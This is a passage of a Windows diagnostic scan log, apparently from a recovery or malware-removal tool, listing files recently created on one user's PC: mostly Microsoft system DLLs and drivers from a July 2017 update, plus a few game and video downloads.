2017-07-13 18:44 - 2017-07-14 09:09 - 000000000 ____D C:\Users\Hercílio\Downloads\Might.and.Magic.Heroes.VI.Shades.of.Darkness-RELOADED
2017-07-13 18:09 - 2017-07-13 18:11 - 050106404 _____ C:\Users\Hercílio\Downloads\PUNCH_Mahou_Tsukai_no_Yome_-_01_MQ.mp4
2017-07-13 17:05 - 2017-07-13 17:06 - 002364667 _____ C:\Users\Hercílio\Downloads\divided_country_56.zip
2017-07-13 10:34 - 2017-07-13 10:34 - 000000000 ____D C:\Users\Hercílio\Documents\Eek
2017-07-13 10:34 - 2017-07-13 10:34 - 000000000 ____D C:\Users\Hercílio\AppData\LocalLow\Eek
2017-07-13 10:15 - 2017-07-13 10:15 - 000000000 ____D C:\Users\Hercílio\Downloads\House.Party
2017-07-13 09:48 - 2017-07-13 09:58 - 1242919569 _____ C:\Users\Hercílio\Downloads\House.Party.zip
2017-07-12 09:29 - 2017-07-07 04:13 - 000554392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-07-12 09:29 - 2017-07-07 04:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-12 09:29 - 2017-07-07 03:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-12 09:29 - 2017-07-07 03:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-12 09:29 - 2017-07-07 03:39 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-07-12 09:29 - 2017-07-07 03:39 - 000096128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll
2017-07-12 09:29 - 2017-07-07 03:37 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-07-12 09:29 - 2017-07-07 03:31 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-07-12 09:29 - 2017-07-07 03:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-12 09:29 - 2017-07-07 03:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-12 09:29 - 2017-07-07 03:30 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-07-12 09:29 - 2017-07-07 03:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-12 09:29 - 2017-07-07 03:30 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2017-07-12 09:29 - 2017-07-07 03:29 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2017-07-12 09:29 - 2017-07-07 03:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-12 09:29 - 2017-07-07 03:27 - 006759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-07-12 09:29 - 2017-07-07 03:26 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-07-12 09:29 - 2017-07-07 03:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-12 09:29 - 2017-07-07 03:26 - 001195240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2017-07-12 09:29 - 2017-07-07 03:26 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-07-12 09:29 - 2017-07-07 03:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-12 09:29 - 2017-07-07 03:23 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-07-12 09:29 - 2017-07-07 03:22 - 000130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys
2017-07-12 09:29 - 2017-07-07 03:14 - 002956800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-07-12 09:29 - 2017-07-07 03:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-12 09:29 - 2017-07-07 03:14 - 000790016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-07-12 09:29 - 2017-07-07 03:13 - 013839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-07-12 09:29 - 2017-07-07 03:12 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-07-12 09:29 - 2017-07-07 03:10 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2017-07-12 09:29 - 2017-07-07 03:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-12 09:29 - 2017-07-07 03:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-12 09:29 - 2017-07-07 03:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-12 09:29 - 2017-07-07 03:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-12 09:29 - 2017-07-07 03:05 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-07-12 09:29 - 2017-07-07 03:05 - 005719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-07-12 09:29 - 2017-07-07 03:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-12 09:29 - 2017-07-07 03:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 005961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-12 09:29 - 2017-07-07 03:04 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2017-07-12 09:29 - 2017-07-07 03:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-12 09:29 - 2017-07-07 03:03 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-07-12 09:29 - 2017-07-07 03:03 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-07-12 09:29 - 2017-07-07 03:02 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-07-12 09:29 - 2017-07-07 03:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 001626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-12 09:29 - 2017-07-07 03:00 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-07-12 09:29 - 2017-07-07 02:59 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-07-12 09:29 - 2017-07-07 02:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-12 09:29 - 2017-07-07 02:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-12 09:29 - 2017-07-07 02:59 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2017-07-12 09:29 - 2017-07-07 02:58 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-07-12 09:29 - 2017-07-07 02:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-12 09:29 - 2017-07-07 02:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-12 09:29 - 2017-07-07 02:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-12 09:29 - 2017-07-07 02:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-12 09:29 - 2017-07-07 02:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-12 09:29 - 2017-07-07 02:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-12 09:29 - 2017-07-07 02:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-12 09:29 - 2017-06-20 03:06 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-07-12 09:29 - 2017-06-20 03:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-12 09:29 - 2017-06-20 02:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-12 09:29 - 2017-06-20 02:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-12 09:29 - 2017-06-20 02:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-12 09:29 - 2017-06-20 02:12 - 000264192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbvideo.sys
2017-07-12 09:29 - 2017-06-20 02:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-12 09:29 - 2017-06-20 02:09 - 000406032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2017-07-12 09:29 - 2017-06-20 02:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-12 09:29 - 2017-06-20 02:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-12 09:29 - 2017-06-20 02:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-12 09:29 - 2017-06-20 02:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-07-12 09:29 - 2017-06-20 02:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-12 09:29 - 2017-06-20 02:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-12 09:29 - 2017-06-20 02:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-12 09:29 - 2017-06-20 02:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-12 09:29 - 2017-06-20 02:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-12 09:29 - 2017-06-20 02:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-12 09:29 - 2017-06-20 02:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-12 09:29 - 2017-06-20 02:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-12 09:29 - 2017-06-20 02:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-12 09:29 - 2017-06-20 02:03 - 005806048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-07-12 09:29 - 2017-06-20 02:03 - 000864240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2017-07-12 09:29 - 2017-06-20 02:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-12 09:29 - 2017-06-20 02:02 - 003377664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-07-12 09:29 - 2017-06-20 02:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-12 09:29 - 2017-06-20 02:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-12 09:29 - 2017-06-20 02:01 - 000176032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2017-07-12 09:29 - 2017-06-20 02:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-12 09:29 - 2017-06-20 01:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-12 09:29 - 2017-06-20 01:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-12 09:29 - 2017-06-20 01:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-12 09:29 - 2017-06-20 01:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-12 09:29 - 2017-06-20 01:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-12 09:29 - 2017-06-20 01:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-12 09:29 - 2017-06-20 01:43 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2017-07-12 09:29 - 2017-06-20 01:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-12 09:29 - 2017-06-20 01:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-12 09:29 - 2017-06-20 01:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-12 09:29 - 2017-06-20 01:42 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2017-07-12 09:29 - 2017-06-20 01:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-12 09:29 - 2017-06-20 01:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-12 09:29 - 2017-06-20 01:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-12 09:29 - 2017-06-20 01:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-12 09:29 - 2017-06-20 01:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-07-12 09:29 - 2017-06-20 01:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2017-07-12 09:29 - 2017-06-20 01:40 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-12 09:29 - 2017-06-20 01:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 002671616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-12 09:29 - 2017-06-20 01:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-12 09:29 - 2017-06-20 01:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-12 09:29 - 2017-06-20 01:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-12 09:29 - 2017-06-20 01:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-12 09:29 - 2017-06-20 01:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-12 09:29 - 2017-06-20 01:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-12 09:29 - 2017-06-20 01:38 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2017-07-12 09:29 - 2017-06-20 01:36 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-07-12 09:29 - 2017-06-20 01:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-12 09:29 - 2017-06-20 01:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-12 09:29 - 2017-06-20 01:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 004056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 002211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-12 09:29 - 2017-06-20 01:34 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2017-07-12 09:29 - 2017-06-20 01:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-12 09:29 - 2017-06-20 01:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-12 09:29 - 2017-06-20 01:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-12 09:29 - 2017-06-20 01:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-12 09:29 - 2017-06-20 01:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-12 09:28 - 2017-07-07 11:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-12 09:28 - 2017-07-07 04:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-12 09:28 - 2017-07-07 04:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-12 09:28 - 2017-07-07 04:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-12 09:28 - 2017-07-07 04:23 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-07-12 09:28 - 2017-07-07 04:22 - 008318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-07-12 09:28 - 2017-07-07 04:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-12 09:28 - 2017-07-07 04:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-12 09:28 - 2017-07-07 04:21 - 002969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-07-12 09:28 - 2017-07-07 04:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-12 09:28 - 2017-07-07 04:20 - 000923040 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-07-12 09:28 - 2017-07-07 04:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-12 09:28 - 2017-07-07 04:20 - 000382368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-07-12 09:28 - 2017-07-07 04:14 - 007325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-07-12 09:28 - 2017-07-07 04:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-12 09:28 - 2017-07-07 04:12 - 000411040 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2017-07-12 09:28 - 2017-07-07 04:12 - 000318232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-07-12 09:28 - 2017-07-07 04:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-12 09:28 - 2017-07-07 04:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-12 09:28 - 2017-07-07 04:10 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-07-12 09:28 - 2017-07-07 04:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-12 09:28 - 2017-07-07 04:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-12 09:28 - 2017-07-07 04:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-12 09:28 - 2017-07-07 04:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-12 09:28 - 2017-07-07 03:40 - 023677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-07-12 09:28 - 2017-07-07 03:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-12 09:28 - 2017-07-07 03:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-12 09:28 - 2017-07-07 03:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-12 09:28 - 2017-07-07 03:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-12 09:28 - 2017-07-07 03:26 - 017364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-07-12 09:28 - 2017-07-07 03:23 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2017-07-12 09:28 - 2017-07-07 03:23 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-07-12 09:28 - 2017-07-07 03:20 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-07-12 09:28 - 2017-07-07 03:20 - 008331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-07-12 09:28 - 2017-07-07 03:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-12 09:28 - 2017-07-07 03:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-12 09:28 - 2017-07-07 03:19 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-07-12 09:28 - 2017-07-07 03:18 - 007336448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-07-12 09:28 - 2017-07-07 03:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-12 09:28 - 2017-07-07 03:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-12 09:28 - 2017-07-07 03:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-12 09:28 - 2017-07-07 03:17 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2017-07-12 09:28 - 2017-07-07 03:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-12 09:28 - 2017-07-07 03:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-12 09:28 - 2017-07-07 03:16 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-07-12 09:28 - 2017-07-07 03:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-12 09:28 - 2017-07-07 03:15 - 008238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-07-12 09:28 - 2017-07-07 03:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-12 09:28 - 2017-07-07 03:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-12 09:28 - 2017-07-07 03:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-12 09:28 - 2017-07-07 03:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-12 09:28 - 2017-07-07 03:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-12 09:28 - 2017-07-07 03:12 - 004730880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-07-12 09:28 - 2017-07-07 03:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-12 09:28 - 2017-07-07 03:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-12 09:28 - 2017-07-07 03:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-12 09:28 - 2017-07-07 03:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-12 09:28 - 2017-07-07 03:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-12 09:28 - 2017-07-07 03:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-12 09:28 - 2017-07-07 03:10 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-07-12 09:28 - 2017-07-07 03:09 - 020504576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-07-12 09:28 - 2017-07-07 03:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-12 09:28 - 2017-07-07 03:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-12 09:28 - 2017-07-07 03:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-12 09:28 - 2017-07-07 03:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-12 09:28 - 2017-07-07 03:05 - 019335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
